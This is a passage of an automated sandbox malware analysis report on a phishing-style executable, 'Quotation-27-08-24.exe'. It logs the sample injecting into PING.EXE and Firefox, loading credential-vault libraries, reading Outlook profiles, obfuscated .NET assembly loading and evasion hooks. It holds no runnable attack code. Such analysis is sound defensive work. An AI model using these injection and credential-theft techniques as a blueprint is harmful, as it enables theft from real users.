            Source: PING.EXE, 00000009.00000002.4566598381.0000000000735000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2649294273.0000000000740000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4566598381.0000000000763000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2646768523.0000000000735000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Quotation-27-08-24.exe Virustotal: Detection: 33%
            Source: unknown Process created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Process created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Process created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Process created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: C:\Windows\SysWOW64\PING.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Process created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Process created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Process created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: C:\Windows\SysWOW64\PING.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: version.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\PING.EXE Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\PING.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Quotation-27-08-24.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Quotation-27-08-24.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uExImirYECsTjI.exe, 00000008.00000002.4568881862.0000000000F9E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Quotation-27-08-24.exe, 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2472694817.00000000029F9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2470494460.000000000284D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Quotation-27-08-24.exe, Quotation-27-08-24.exe, 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, PING.EXE, 00000009.00000002.4571956387.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2472694817.00000000029F9000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4571956387.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000009.00000003.2470494460.000000000284D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ping.pdbGCTL source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000003.2409401070.000000000082B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ping.pdb source: Quotation-27-08-24.exe, 00000004.00000002.2470520763.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000003.2409401070.000000000082B000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Quotation-27-08-24.exe, Form2.cs .Net Code: _206E_206E_206E_200F_200D_202E_206A_206C_202D_200D_200D_200D_200F_206C_202A_202A_200B_202E_206E_206B_206D_206F_202B_200B_200C_200B_202D_202C_202A_202C_200E_202D_200F_206E_206B_200F_206D_202D_200B_206A_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Quotation-27-08-24.exe.7450000.8.raw.unpack, PingPong.cs .Net Code: _202B_206B_206C_202A_206A_202A_200D_200F_200B_202D_206D_202A_206D_206E_206A_202B_200F_200D_202B_202B_202D_206C_200F_206C_206A_206E_200C_202D_206F_206D_206A_202D_200C_200D_200E_206D_200E_202D_206E_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Quotation-27-08-24.exe.4ad6a80.4.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs .Net Code: TilkD3ufsn System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs .Net Code: TilkD3ufsn System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Quotation-27-08-24.exe.3e245c0.5.raw.unpack, PingPong.cs .Net Code: _202B_206B_206C_202A_206A_202A_200D_200F_200B_202D_206D_202A_206D_206E_206A_202B_200F_200D_202B_202B_202D_206C_200F_206C_206A_206E_200C_202D_206F_206D_206A_202D_200C_200D_200E_206D_200E_202D_206E_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, M5ZwT7wH5KHQyEZZcg.cs .Net Code: TilkD3ufsn System.Reflection.Assembly.Load(byte[])
            Source: 8.2.uExImirYECsTjI.exe.33ccd14.1.raw.unpack, Form2.cs .Net Code: _206E_206E_206E_200F_200D_202E_206A_206C_202D_200D_200D_200D_200F_206C_202A_202A_200B_202E_206E_206B_206D_206F_202B_200B_200C_200B_202D_202C_202A_202C_200E_202D_200F_206E_206B_200F_206D_202D_200B_206A_202E System.Reflection.Assembly.Load(byte[])
            Source: 9.2.PING.EXE.327cd14.2.raw.unpack, Form2.cs .Net Code: _206E_206E_206E_200F_200D_202E_206A_206C_202D_200D_200D_200D_200F_206C_202A_202A_200B_202E_206E_206B_206D_206F_202B_200B_200C_200B_202D_202C_202A_202C_200E_202D_200F_206E_206B_200F_206D_202D_200B_206A_202E System.Reflection.Assembly.Load(byte[])
            Source: 12.2.firefox.exe.3f52cd14.0.raw.unpack, Form2.cs .Net Code: _206E_206E_206E_200F_200D_202E_206A_206C_202D_200D_200D_200D_200F_206C_202A_202A_200B_202E_206E_206B_206D_206F_202B_200B_200C_200B_202D_202C_202A_202C_200E_202D_200F_206E_206B_200F_206D_202D_200B_206A_202E System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 0_2_05388975 push 690524AEh; ret 0_2_0538897A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 0_2_05388A4C push 690524AEh; ret 0_2_05388A51
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 0_2_053B8B00 push eax; mov dword ptr [esp], ecx 0_2_053B8B04
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_004018AD push eax; retf 4_2_004018B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00413103 push ds; ret 4_2_00413139
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_004051E3 push edi; retf 4_2_004051E4
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_0041EA2B push esp; iretd 4_2_0041EA2C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_004234D3 push 0AA621A6h; retf 4_2_00423530
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_004014E5 push eax; ret 4_2_004014F1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_0041E543 push esi; iretd 4_2_0041E550
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_0041E57D push esp; iretd 4_2_0041E5A3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_0041E53B push esi; iretd 4_2_0041E550
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00401653 push eax; ret 4_2_0040165D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00424E13 push es; retf 4_2_00424ECC
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00403630 push eax; ret 4_2_00403632
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00F3225F pushad ; ret 4_2_00F327F9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00F327FA pushad ; ret 4_2_00F327F9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00F3283D push eax; iretd 4_2_00F32858
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00F609AD push ecx; mov dword ptr [esp], ecx 4_2_00F609B6
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00F31366 push eax; iretd 4_2_00F31369
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_029A8230 push esp; iretd 8_2_029A8256
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_029A81EE push esi; iretd 8_2_029A8203
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_0298EE96 push edi; retf 8_2_0298EE97
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_029A86DE push esp; iretd 8_2_029A86DF
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_0299CDB6 push ds; ret 8_2_0299CDEC
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_05815D30 push esp; retf 8_2_05815D31
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_0582A4B1 push esp; iretd 8_2_0582A4B2
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_05810C69 push edi; retf 8_2_05810C6A
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_05829FC1 push esi; iretd 8_2_05829FD6
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_05829FC9 push esi; iretd 8_2_05829FD6
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe Code function: 8_2_05815FFA pushad ; ret 8_2_0581600B
            Source: Quotation-27-08-24.exe Static PE information: section name: .text entropy: 7.7665587747016405
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, C56ta8zHuuIeifniuo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CBLMGBWUFu', 'KRUMJ5kA3E', 'MI2MKfpnRC', 'oJXMZx8sTM', 'NeJMeBxj7x', 'zsYMMPLIqv', 'eL7MOG7hws'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, Pk7gKCWxMS2D27EAuq.csHigh entropy of concatenated method names: 'MgZDAnxmX', 'SegaYPSO2', 'jJbt0j19M', 'LFEdl2M2V', 'RyGNZbgYh', 'kpGRXRoX8', 'NBOvVauOthssnSCThT', 'fqBX3nVmDk8DFtdqNK', 'UeFevn6KT', 'YntO0obEu'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, PLN33dCFiGTP0HXfeD3.csHigh entropy of concatenated method names: 'CHSMgxExNq', 'x2XMuOuRlj', 'So5MDjnESa', 'sf0Ma3MeBD', 'cnbM0pm3vm', 'rJEMtiohoj', 'BrIMdnR2yu', 'evXM5SQT6Z', 'RN9MNN6vv6', 's2YMRyoU2r'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, AFjkxcES1oRaQ4dZsJ.csHigh entropy of concatenated method names: 'Dispose', 'JCxC72SbDX', 'gToW8UdhoC', 'SHVbbV517d', 'nrqCTQg4Cj', 'CHpCzXk16B', 'ProcessDialogKey', 'lW3WFmviDc', 'E0cWCaHLWt', 'a2tWWgWtnR'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, EdTxQuNgOo1V5kLIjO.csHigh entropy of concatenated method names: 'FY79aeFKY2', 'tXR9t7xJnQ', 'gIT95f5clC', 'yO19N9WxLt', 'W7w9JGbY6p', 'dch9KWqajT', 'BJy9ZZuQLc', 'wCd9e7bKKL', 'GYH9MDyloV', 'H2P9OusFdd'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, yWtnRxT5Mv2k8WufJX.csHigh entropy of concatenated method names: 'PPBMC7nPwx', 'P1QMo0Ju6Z', 'ESqMkTvtxs', 'dYNMSJFRvU', 'hObMEKMc4E', 'zBHMX5vdus', 'ppRMY6HiIj', 'M67erhdr9x', 'UlPe4FU7RU', 'dOhe7xbNQn'
            Source: 0.2.Quotation-27-08-24.exe.9ab0000.9.raw.unpack, fTHmXrkWA2bYu5qWfc.csHigh entropy of concatenated method names: 'fQ5CvwT4tW', 'yadCwbjQJA', 'ygOC3o1V5k', 'UIjCqOmSvF', 'L7LCJdeRyB', 'VYeCKdE919', 'BiVfpIGHYJDEBiMZUg', 'raiAfUDRBO44OjmNDx', 'Q6OCCW8MIs', 'pG8Coy61dQ'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, RC9YV2CohNNtWAN9eQh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MYrOBriFfl', 'SWZOcab91Y', 'KU5OnvtxNC', 'TZxObRu2O8', 'yDROLvaDEU', 'cO0OP1Nj8O', 'Y5MOrbw4wd'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, C4rU7FjAjSAnMYttCh.csHigh entropy of concatenated method names: 'HOEvSX1ZH8', 'TZov9lgbSO', 'DuOvYAvwVI', 'QEhYT4geM0', 'WoUYzMxamh', 'He0vFDQI6S', 'GS9vCdJGol', 'BvjvWTicIC', 'NVFvoqdf05', 'RNQvklxRnG'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, M5ZwT7wH5KHQyEZZcg.csHigh entropy of concatenated method names: 'oEvofNDAXh', 'fmIoSOpBnm', 'Pd5oEoeqEG', 'SwYo9TVXYF', 'qxgoX6hyWD', 'mk3oYaGWd1', 'bTSovMdiPl', 'XQyowxxyiX', 'm9molTdjpI', 'uPio3HaWSm'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, mmviDc7N0caHLWtF2t.csHigh entropy of concatenated method names: 'Xaaesc4c0A', 'jEue8wGMh2', 'MbeeV8hZEu', 'MAweHXg0dD', 'pIDeBbLSqa', 'CESeAsvigN', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, MxmaASPmsUBimDUl04.csHigh entropy of concatenated method names: 'sTMZ4wNijT', 'CGvZTloScv', 'vmIeFyBY0h', 'JC7eC0RmD3', 'bBLZ2h6PJL', 'zB0ZyQ7DuK', 'D5MZi4iekJ', 'bvEZB9mSZQ', 'TM2Zcqssts', 'oMWZnCq1ku'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, EwT4tW5uadbjQJAJ5v.csHigh entropy of concatenated method names: 'k9xEBSeSPG', 'AWDEcHlb5R', 'KLiEntOs9G', 'jOREbQYIVe', 'YfIELyIKH1', 'nqeEPbQCSF', 'epdErpm3Jx', 'aEUE4AlAib', 'UGTE7fiLka', 'PGYETfCiwu'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, kK9H7jbFSqaYpGNiAx.csHigh entropy of concatenated method names: 'djUZ326pSH', 'JcsZqU4XBa', 'ToString', 'O7JZSOA15D', 'NnZZEQewwY', 'ao5Z9vmCIX', 'x1UZXy2yG5', 'EhNZYHHJ1T', 'Ml8Zvbdsbd', 'eUsZw6wOdj'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, WqQg4C4jdHpXk16BlW.csHigh entropy of concatenated method names: 'OHaeSmSWcC', 'gSHeEEyrWt', 'udQe9oNcDD', 'AAueXqWSDM', 'aaTeYgePO3', 'bJZevLBW0l', 'HMNewabCvs', 'VF0elFeiwg', 'Kqne3G4kRg', 'S3NeqCCPNH'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, FyBPYesdE919Yx0W9e.csHigh entropy of concatenated method names: 'PGJYf4YFhj', 'e5fYERMhPd', 'iDjYXWEgeV', 'xMCYv1hTo6', 'Ri6YwGtyKs', 'm8eXLPufoG', 'IH2XPVYAlQ', 'QngXroxiPe', 'LJNX4WKoLV', 'W20X7BMyw2'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, lFcmv1U4dviCCDrbve.csHigh entropy of concatenated method names: 'UZnvgPYY53', 'UjuvuoyPgv', 'CC7vDdFioU', 'mBJvaLbVvc', 'Q3Ov02rjPt', 'txUvtJqA7E', 'Dt0vdSUqtG', 'UxEv5lhbWq', 'e2XvN0mNee', 'dQPvR7QjAf'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, SEGJB7BbOJIkArUsbG.csHigh entropy of concatenated method names: 'p0ZJhrTcy6', 'y5bJyKsTB8', 'jpvJBumsdm', 'BPmJcs69UX', 'wglJ8WFN14', 'v9eJVZ2ET4', 'pktJHatJMG', 'MFfJAg8Z2H', 'e72J1Xo02d', 'ScFJjbJTKW'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, jjsengi1HStSOep4i4.csHigh entropy of concatenated method names: 'PR0G5lY49V', 'HTlGNgOPDN', 'm7vGsL7fLK', 'PKyG8qrQFE', 'YMOGHsvmSb', 'RMAGAeR3gU', 'E1FGjvPIQM', 'jYCGI2cJGe', 'F2EGhiBy5R', 'rTBG2Q0tq9'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, vSvFUaRGAmW0kj7Lde.csHigh entropy of concatenated method names: 'd4CX09d69c', 'wu1Xdtsjlu', 'cOw9VvfQ1d', 'M6R9HRyIGN', 'fZR9AlmEko', 'M7Y91BYHmh', 'R5V9jLIaLS', 'Ajm9IPV0dk', 'C2X9UvsW2v', 'R9j9hk80Hg'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, ha0jl6nQL84oCNUF25.csHigh entropy of concatenated method names: 'ToString', 'JDfK2q4UX0', 'JSnK8kswlq', 'mx2KVwi0HS', 'NdPKHoE2aB', 'Y2DKAYGni3', 'kfMK1cefOT', 'YjUKjaCTiK', 'Fu1KIP99Ma', 'GjBKUW1Uva'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, C56ta8zHuuIeifniuo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CBLMGBWUFu', 'KRUMJ5kA3E', 'MI2MKfpnRC', 'oJXMZx8sTM', 'NeJMeBxj7x', 'zsYMMPLIqv', 'eL7MOG7hws'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, Pk7gKCWxMS2D27EAuq.csHigh entropy of concatenated method names: 'MgZDAnxmX', 'SegaYPSO2', 'jJbt0j19M', 'LFEdl2M2V', 'RyGNZbgYh', 'kpGRXRoX8', 'NBOvVauOthssnSCThT', 'fqBX3nVmDk8DFtdqNK', 'UeFevn6KT', 'YntO0obEu'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, PLN33dCFiGTP0HXfeD3.csHigh entropy of concatenated method names: 'CHSMgxExNq', 'x2XMuOuRlj', 'So5MDjnESa', 'sf0Ma3MeBD', 'cnbM0pm3vm', 'rJEMtiohoj', 'BrIMdnR2yu', 'evXM5SQT6Z', 'RN9MNN6vv6', 's2YMRyoU2r'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, AFjkxcES1oRaQ4dZsJ.csHigh entropy of concatenated method names: 'Dispose', 'JCxC72SbDX', 'gToW8UdhoC', 'SHVbbV517d', 'nrqCTQg4Cj', 'CHpCzXk16B', 'ProcessDialogKey', 'lW3WFmviDc', 'E0cWCaHLWt', 'a2tWWgWtnR'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, EdTxQuNgOo1V5kLIjO.csHigh entropy of concatenated method names: 'FY79aeFKY2', 'tXR9t7xJnQ', 'gIT95f5clC', 'yO19N9WxLt', 'W7w9JGbY6p', 'dch9KWqajT', 'BJy9ZZuQLc', 'wCd9e7bKKL', 'GYH9MDyloV', 'H2P9OusFdd'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, yWtnRxT5Mv2k8WufJX.csHigh entropy of concatenated method names: 'PPBMC7nPwx', 'P1QMo0Ju6Z', 'ESqMkTvtxs', 'dYNMSJFRvU', 'hObMEKMc4E', 'zBHMX5vdus', 'ppRMY6HiIj', 'M67erhdr9x', 'UlPe4FU7RU', 'dOhe7xbNQn'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, fTHmXrkWA2bYu5qWfc.csHigh entropy of concatenated method names: 'fQ5CvwT4tW', 'yadCwbjQJA', 'ygOC3o1V5k', 'UIjCqOmSvF', 'L7LCJdeRyB', 'VYeCKdE919', 'BiVfpIGHYJDEBiMZUg', 'raiAfUDRBO44OjmNDx', 'Q6OCCW8MIs', 'pG8Coy61dQ'
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\PING.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: Quotation-27-08-24.exe PID: 3880, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\PING.EXE API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Memory allocated: 13C0000 memory reserve | memory write watch
